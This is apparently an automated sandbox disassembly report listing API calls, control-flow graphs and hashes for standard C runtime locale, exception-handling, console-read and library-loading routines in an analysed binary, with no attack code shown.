  • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0068DF28
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
APIs
  • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
  • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
• EnumSystemLocalesW.KERNEL32(0068DC81,00000001,00000000,?,-00000050,?,0068E2B5,00000000,?,?,?,00000055,?), ref: 0068DBCD
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
APIs
  • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
  • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0068DE9D,00000000,00000000,?), ref: 0068E12F
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
APIs
  • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
  • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
• EnumSystemLocalesW.KERNEL32(0068DED4,00000001,?,?,-00000050,?,0068E27D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0068DC40
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
APIs
  • Part of subcall function 0067EC95: EnterCriticalSection.KERNEL32(?,?,006858B2,?,0069DC50,00000008,00685A76,?,0067D8B6,?), ref: 0067ECA4
• EnumSystemLocalesW.KERNEL32(00686AA4,00000001,0069DD10,0000000C,00686E7C,00000000), ref: 00686AE9
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
APIs
  • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
  • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
• EnumSystemLocalesW.KERNEL32(0068DA69,00000001,?,?,?,0068E2D7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0068DB47
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006836E4,?,20001004,00000000,00000002,?,?,00682CD6), ref: 00686FB4
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00008FA9,006783B3), ref: 00678FA2
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: e95c4bee417f2fc73e9ee16b6469262437f001ad136a60d70d5b2978b6286a39
                                                                                                  • Instruction ID: 3213651de1342405732833a92e9d22d4d179f9d5f139d555edd418499f8795aa
                                                                                                  • Opcode Fuzzy Hash: e95c4bee417f2fc73e9ee16b6469262437f001ad136a60d70d5b2978b6286a39
                                                                                                  • Instruction Fuzzy Hash: E1A012315001008B53005F315905A0837AA5A05291305A0165009C0060DE2450415F00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1452528299-0
                                                                                                  • Opcode ID: c6d81d1accb3582012ba4dfed229a5d4cbec22f45bfef3db4a7c20b5d71d3e5f
                                                                                                  • Instruction ID: 41583f1ed5e6d3d6fb505984122058558ae5cfc20c6f688dd20657f730b212ce
                                                                                                  • Opcode Fuzzy Hash: c6d81d1accb3582012ba4dfed229a5d4cbec22f45bfef3db4a7c20b5d71d3e5f
                                                                                                  • Instruction Fuzzy Hash: 5BB1F5355007059BDB34BB24CC92AB7B3EAEF44308F14466EEA47C66C0EA75F9858B21

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 464 674b70-674bc2 call 6761c5 467 674bc4-674bd3 call 6761c5 464->467 468 674bf3-674c00 464->468 477 674be5-674bed call 67621d 467->477 478 674bd5-674be0 467->478 470 674c32 468->470 471 674c02-674c0a 468->471 472 674c34-674c38 470->472 471->472 474 674c0c-674c31 call 67621d call 678287 471->474 475 674c4a-674c4c 472->475 476 674c3a-674c42 call 676512 472->476 475->474 481 674c4e-674c53 475->481 476->481 490 674c44-674c47 476->490 477->468 478->477 486 674c55-674c57 481->486 487 674c59-674c70 call 67829a 481->487 486->474 493 674c72-674c77 487->493 494 674c7e 487->494 490->475 495 674c83-674cc9 call 6761c5 493->495 496 674c79-674c7c 493->496 494->495 499 674ccf-674cfb call 676616 call 676661 495->499 500 674daa-674db4 call 67638c 495->500 496->495 507 674d06-674d12 499->507 508 674cfd-674d03 call 67e8b9 499->508 510 674d14-674d1a call 67e8b9 507->510 511 674d1d-674d29 507->511 508->507 510->511 512 674d34-674d40 511->512 513 674d2b-674d31 call 67e8b9 511->513 517 674d42-674d48 call 67e8b9 512->517 518 674d4b-674d57 512->518 513->512 517->518 522 674d62-674d6e 518->522 523 674d59-674d5f call 67e8b9 518->523 526 674d70-674d76 call 67e8b9 522->526 527 674d79-674da5 call 67621d call 6764e6 522->527 523->522 526->527 527->474
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674BA6
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674BC8
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00674BE8
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00674C0F
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674C88
                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00674CD4
                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00674CEE
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00674D83
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00674D90
                                                                                                    • Part of subcall function 0067638C: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00676398
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 1592514138-1405518554
                                                                                                  • Opcode ID: 5af9a4cfadf56f78e18a0e388d1d9e613583926e45105bcfeb65804dc0c472f7
                                                                                                  • Instruction ID: 03a54d98e3713e76fc446f37ab3ce1f6343fc334dfd9c1dfb69bd7a46e6de1f8
                                                                                                  • Opcode Fuzzy Hash: 5af9a4cfadf56f78e18a0e388d1d9e613583926e45105bcfeb65804dc0c472f7
                                                                                                  • Instruction Fuzzy Hash: B96192B1D01204DFEF51DFE8D949BDEBBB6AF08310F148459E809AB341EB35A909CB95

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 536 675a20-675a5c 537 675c67-675c7c 536->537 538 675a62-675a65 536->538 538->537 539 675a6b-675a91 call 67829a 538->539 542 675a93-675a98 539->542 543 675a9f 539->543 544 675aa4-675aea call 6761c5 542->544 545 675a9a-675a9d 542->545 543->544 548 675af0-675b59 call 676616 call 67e891 call 677cef * 2 call 67ca63 544->548 549 675c7d-675c82 call 67638c 544->549 545->544 552 675c87 call 67632f 548->552 568 675b5f-675b75 call 67ca63 548->568 549->552 556 675c8c call 67632f 552->556 560 675c91-675c96 call 67632f 556->560 568->556 571 675b7b-675b9f call 67ca63 568->571 571->560 574 675ba5-675bda call 676661 571->574 577 675be5-675bf1 574->577 578 675bdc-675be2 call 67e8b9 574->578 580 675bf3-675bf9 call 67e8b9 577->580 581 675bfc-675c08 577->581 578->577 580->581 582 675c13-675c1f 581->582 583 675c0a-675c10 call 67e8b9 581->583 588 675c21-675c27 call 67e8b9 582->588 589 675c2a-675c36 582->589 583->582 588->589 592 675c41-675c4d 589->592 593 675c38-675c3e call 67e8b9 589->593 596 675c4f-675c55 call 67e8b9 592->596 597 675c58-675c62 call 67621d 592->597 593->592 596->597 597->537
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00675AA9
                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00675AF5
                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00675BCD
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00675C62
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00675C87
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00675C8C
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00675C91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Concurrency::cancel_current_task$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                  • String ID: bad locale name$false$true
                                                                                                  • API String ID: 3559308103-1062449267
                                                                                                  • Opcode ID: 6e4bf975d934a2dac165bd3218595ccb63571db6c3effb35de4b1a26eb6ddc9e
                                                                                                  • Instruction ID: b76453c9d190f22ae781582d20ef328779c3db5c717f96e4cab876671b35e1ac
                                                                                                  • Opcode Fuzzy Hash: 6e4bf975d934a2dac165bd3218595ccb63571db6c3effb35de4b1a26eb6ddc9e
                                                                                                  • Instruction Fuzzy Hash: DB616DB0D00748DFEB50DFA4D94579EBBBAAF04310F14856DE819A7381E7B59A04CBA1

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 602 67ba88-67bab3 call 67ca00 605 67be27-67be2c call 68128d 602->605 606 67bab9-67babc 602->606 606->605 607 67bac2-67bacb 606->607 609 67bad1-67bad5 607->609 610 67bbc8-67bbce 607->610 609->610 612 67badb-67bae2 609->612 613 67bbd6-67bbe4 610->613 616 67bae4-67baeb 612->616 617 67bafa-67baff 612->617 614 67bd90-67bd93 613->614 615 67bbea-67bbee 613->615 620 67bdb6-67bdbf call 67b70c 614->620 621 67bd95-67bd98 614->621 615->614 618 67bbf4-67bbfb 615->618 616->617 619 67baed-67baf4 616->619 617->610 622 67bb05-67bb0d call 67b70c 617->622 625 67bc13-67bc19 618->625 626 67bbfd-67bc04 618->626 619->610 619->617 620->605 636 67bdc1-67bdc5 620->636 621->605 623 67bd9e-67bdb3 call 67be2d 621->623 635 67bb13-67bb2c call 67b70c * 2 622->635 622->636 623->620 631 67bd30-67bd34 625->631 632 67bc1f-67bc46 call 6790eb 625->632 626->625 630 67bc06-67bc0d 626->630 630->614 630->625 638 67bd36-67bd3f call 67953f 631->638 639 67bd40-67bd4c 631->639 632->631 647 67bc4c-67bc4f 632->647 635->605 661 67bb32-67bb38 635->661 638->639 639->620 640 67bd4e-67bd58 639->640 644 67bd66-67bd68 640->644 645 67bd5a-67bd5c 640->645 650 67bd7f-67bd8c call 67c4a6 644->650 651 67bd6a-67bd7d call 67b70c * 2 644->651 645->620 649 67bd5e-67bd62 645->649 653 67bc52-67bc67 647->653 649->620 654 67bd64 649->654 669 67bd8e 650->669 670 67bdeb-67be00 call 67b70c * 2 650->670 677 67bdc6 call 684008 651->677 657 67bd11-67bd24 653->657 658 67bc6d-67bc70 653->658 654->651 657->653 662 67bd2a-67bd2d 657->662 658->657 663 67bc76-67bc7e 658->663 666 67bb64-67bb6c call 67b70c 661->666 667 67bb3a-67bb3e 661->667 662->631 663->657 668 67bc84-67bc98 663->668 683 67bbd0-67bbd3 666->683 684 67bb6e-67bb8e call 67b70c * 2 call 67c4a6 666->684 667->666 673 67bb40-67bb47 667->673 674 67bc9b-67bcac 668->674 669->620 698 67be05-67be22 call 6792d7 call 67c3a6 call 67c563 call 67c31d 670->698 699 67be02 670->699 678 67bb5b-67bb5e 673->678 679 67bb49-67bb50 673->679 680 67bcd2-67bcdf 674->680 681 67bcae-67bcbf call 67bf63 674->681 694 67bdcb-67bde6 call 67953f call 67c117 call 6796fd 677->694 678->605 678->666 679->678 688 67bb52-67bb59 679->688 680->674 686 67bce1 680->686 695 67bce3-67bd0b call 67ba08 681->695 696 67bcc1-67bcca 681->696 683->613 684->683 716 67bb90-67bb95 684->716 693 67bd0e 686->693 688->666 688->678 693->657 694->670 695->693 696->681 701 67bccc-67bccf 696->701 698->605 699->698 701->680 716->677 718 67bb9b-67bbae call 67c12f 716->718 718->694 723 67bbb4-67bbc0 718->723 723->677 724 67bbc6 723->724 724->718
                                                                                                  APIs
                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0067BBA7
                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0067BCB5
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0067BE07
                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0067BE22
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 2751267872-393685449
                                                                                                  • Opcode ID: dd6619496aa0c57afa456da28d5711ae03e7df8d64213c2739ce378bdcbd91ae
                                                                                                  • Instruction ID: 36f8c529a147452195dbe7a62a8704c7373d61c829f9bae32fc3a4c7c2bbdfa3
                                                                                                  • Opcode Fuzzy Hash: dd6619496aa0c57afa456da28d5711ae03e7df8d64213c2739ce378bdcbd91ae
                                                                                                  • Instruction Fuzzy Hash: A1B14871800209EFCF29DFA4C881AEEB7B6FF54310F14916AE8196B316D731EA51CB95

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 725 689778-689788 726 68978a-68979d call 680cfb call 680d0e 725->726 727 6897a2-6897a4 725->727 743 689afc 726->743 729 6897aa-6897b0 727->729 730 689ae4-689af1 call 680cfb call 680d0e 727->730 729->730 733 6897b6-6897df 729->733 748 689af7 call 67ebf3 730->748 733->730 736 6897e5-6897ee 733->736 739 689808-68980a 736->739 740 6897f0-689803 call 680cfb call 680d0e 736->740 741 689ae0-689ae2 739->741 742 689810-689814 739->742 740->748 747 689aff-689b02 741->747 742->741 746 68981a-68981e 742->746 743->747 746->740 750 689820-689837 746->750 748->743 753 689839-68983c 750->753 754 68986c-689872 750->754 756 68983e-689844 753->756 757 689862-68986a 753->757 758 689874-68987b 754->758 759 689846-68985d call 680cfb call 680d0e call 67ebf3 754->759 756->757 756->759 763 6898df-6898fe 757->763 760 68987d 758->760 761 68987f-68989d call 684839 call 6847ff * 2 758->761 790 689a17 759->790 760->761 795 6898ba-6898dd call 689d09 761->795 796 68989f-6898b5 call 680d0e call 680cfb 761->796 764 6899ba-6899c3 call 6903c8 763->764 765 689904-689910 763->765 779 689a34 764->779 780 6899c5-6899d7 764->780 765->764 768 689916-689918 765->768 768->764 772 68991e-68993f 768->772 772->764 776 689941-689957 772->776 776->764 781 689959-68995b 776->781 783 689a38-689a4e ReadFile 779->783 780->779 785 6899d9-6899e8 GetConsoleMode 780->785 781->764 786 68995d-689980 781->786 788 689aac-689ab7 GetLastError 783->788 789 689a50-689a56 783->789 785->779 791 6899ea-6899ee 785->791 786->764 794 689982-689998 786->794 797 689ab9-689acb call 680d0e call 680cfb 788->797 798 689ad0-689ad3 788->798 789->788 799 689a58 789->799 793 689a1a-689a24 call 6847ff 790->793 791->783 792 6899f0-689a08 ReadConsoleW 791->792 800 689a29-689a32 792->800 801 689a0a GetLastError 792->801 793->747 794->764 805 68999a-68999c 794->805 795->763 796->790 797->790 802 689ad9-689adb 798->802 803 689a10-689a16 call 680cb4 798->803 809 689a5b-689a6d 799->809 800->809 801->803 802->793 803->790 805->764 812 68999e-6899b5 805->812 809->793 816 689a6f-689a73 809->816 812->764 817 689a8c-689a99 816->817 818 689a75-689a85 call 68948a 816->818 824 689a9b call 6895e1 817->824 825 689aa5-689aaa call 6892d0 817->825 830 689a88-689a8a 818->830 831 689aa0-689aa3 824->831 825->831 830->793 831->830
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3907804496
                                                                                                  • Opcode ID: dc0bc450d2865d62e75bca82ddb03fab743df09fab9fb20145a13afe4f7df0e7
                                                                                                  • Instruction ID: d97d289146c0df76265d10de8abb01cdc240c5ffb664578cf944ce44de370d45
                                                                                                  • Opcode Fuzzy Hash: dc0bc450d2865d62e75bca82ddb03fab743df09fab9fb20145a13afe4f7df0e7
                                                                                                  • Instruction Fuzzy Hash: 12B1F470A04249AFEB15FFA8C880BBE7BB7AF46314F184359E50597392C7B19942CB74

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 833 675460-6754b3 call 6761c5 836 6754b5-6754c4 call 6761c5 833->836 837 6754e4-6754f4 833->837 845 6754d6-6754de call 67621d 836->845 846 6754c6-6754d1 836->846 838 6754f6-6754fe 837->838 839 675502-675504 837->839 841 675560-675585 call 67621d call 678287 838->841 842 675500 838->842 843 675507-67550b 839->843 842->843 848 675520-675522 843->848 849 67550d-675515 call 676512 843->849 845->837 846->845 848->841 853 675524-675526 848->853 849->853 861 675517-67551d 849->861 857 67552c-67553e call 675a20 853->857 858 675528-67552a 853->858 863 675586-67558b call 671880 857->863 864 675540-67555a call 6764e6 857->864 858->841 861->848 864->841
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00675496
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 006754B9
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 006754D9
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0067554B
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00675563
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00675586
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                  • String ID: U8i
                                                                                                  • API String ID: 2081738530-3066515534
                                                                                                  • Opcode ID: 8f1f539c94fbce10ade97b05dcd7ee0ebd37b6e23e0caa64ac7e474399da85aa
                                                                                                  • Instruction ID: 4cde4c7b37da8fb877f5a308439bc45115566dcf24b10913bc152dd52c998b4f
                                                                                                  • Opcode Fuzzy Hash: 8f1f539c94fbce10ade97b05dcd7ee0ebd37b6e23e0caa64ac7e474399da85aa
                                                                                                  • Instruction Fuzzy Hash: 0341AF72D00A199FDB54EF94D841AAEB7B6FF08720F148299E81A67351E770BE40CB90

Control-flow Graph
control_flow_graph 870 686c7e-686c8a 871 686d1c-686d1f 870->871 872 686c8f-686ca0 871->872 873 686d25 871->873 875 686cad-686cc6 LoadLibraryExW 872->875 876 686ca2-686ca5 872->876 874 686d27-686d2b 873->874 879 686cc8-686cd1 GetLastError 875->879 880 686d2c-686d3c 875->880 877 686cab 876->877 878 686d45-686d47 876->878 882 686d19 877->882 878->874 883 686d0a-686d17 879->883 884 686cd3-686ce5 call 684768 879->884 880->878 881 686d3e-686d3f FreeLibrary 880->881 881->878 882->871 883->882 884->883 887 686ce7-686cf9 call 684768 884->887 887->883 890 686cfb-686d08 LoadLibraryExW 887->890 890->880 890->883
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,8DFC4D89,?,EBD99D41,?,00686D8D,0067D8B6,?,00000000,8DFC4D89), ref: 00686D3F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
• Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-$tg
• API String ID: 3664257935-3900055408
• Opcode ID: 279e27fe39a7ed46bb1d241061504a1d32989436ad836f6c397b407e806100f9
• Instruction ID: fc709c3ac5b6f33d5bb95adbf71a205f245de5c2130c96db19cdead8a15089c8
• Opcode Fuzzy Hash: 279e27fe39a7ed46bb1d241061504a1d32989436ad836f6c397b407e806100f9
• Instruction Fuzzy Hash: 2321E472B01215ABDB31BB60EC40A9A776BAF42765F251311FA06A7391DB70ED01CBE0

Control-flow Graph
control_flow_graph 891 67809d-6780b5 892 6780b7-6780c7 call 6812d1 891->892 893 6780cb-6780f3 MultiByteToWideChar 891->893 892->893 904 6780c9 892->904 895 678257-678268 call 678287 893->895 896 6780f9-678105 893->896 897 678247 896->897 898 67810b-678110 896->898 903 67824b 897->903 901 678125-678130 call 67ed0b 898->901 902 678112-67811b call 678860 898->902 913 67813b-678140 901->913 914 678132 901->914 912 67811d-678123 902->912 902->913 908 67824d-678255 call 678084 903->908 904->893 908->895 916 678138 912->916 913->903 917 678146-678159 MultiByteToWideChar 913->917 914->916 916->913 917->903 918 67815f-678178 LCMapStringEx 917->918 918->903 919 67817e-678186 918->919 920 6781b8-6781c4 919->920 921 678188-67818d 919->921 922 6781c6-6781c8 920->922 923 678239 920->923 921->908 924 678193-678195 921->924 926 6781dd-6781e8 call 67ed0b 922->926 927 6781ca-6781d3 call 678860 922->927 928 67823d-678245 call 678084 923->928 924->908 925 67819b-6781b3 LCMapStringEx 924->925 925->908 936 6781f3-6781f8 926->936 937 6781ea 926->937 935 6781d5-6781db 927->935 927->936 928->908 938 6781f0 935->938 936->928 939 6781fa-678214 LCMapStringEx 936->939 937->938 938->936 939->928 940 678216-67821d 939->940 941 678223-678226 940->941 942 67821f-678221 940->942 943 678229-678237 WideCharToMultiByte 941->943 942->943 943->928
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,0069BAA9,?,?,bad locale name), ref: 006780E6
• __alloca_probe_16.LIBCMT ref: 00678112
• MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 00678151
• LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 0067816E
• LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 006781AD
• __alloca_probe_16.LIBCMT ref: 006781CA
• LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 0067820C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 0067822F
Memory Dump Source
• Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
• Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
• Opcode ID: 18eebc1bc02c82c0fdba7616b1fe20ffd5c32d88d902009206effbacdf0833d5
• Instruction ID: 7cc27df75fdf96bb3106fbd510550c634d69918544e1e64dd67fa0514686bc2a
• Opcode Fuzzy Hash: 18eebc1bc02c82c0fdba7616b1fe20ffd5c32d88d902009206effbacdf0833d5
• Instruction Fuzzy Hash: 6D51B372540606AFDB209F60CC49FEB7BAAEF44741F158029F919E7251DF348D12CBA0

Control-flow Graph
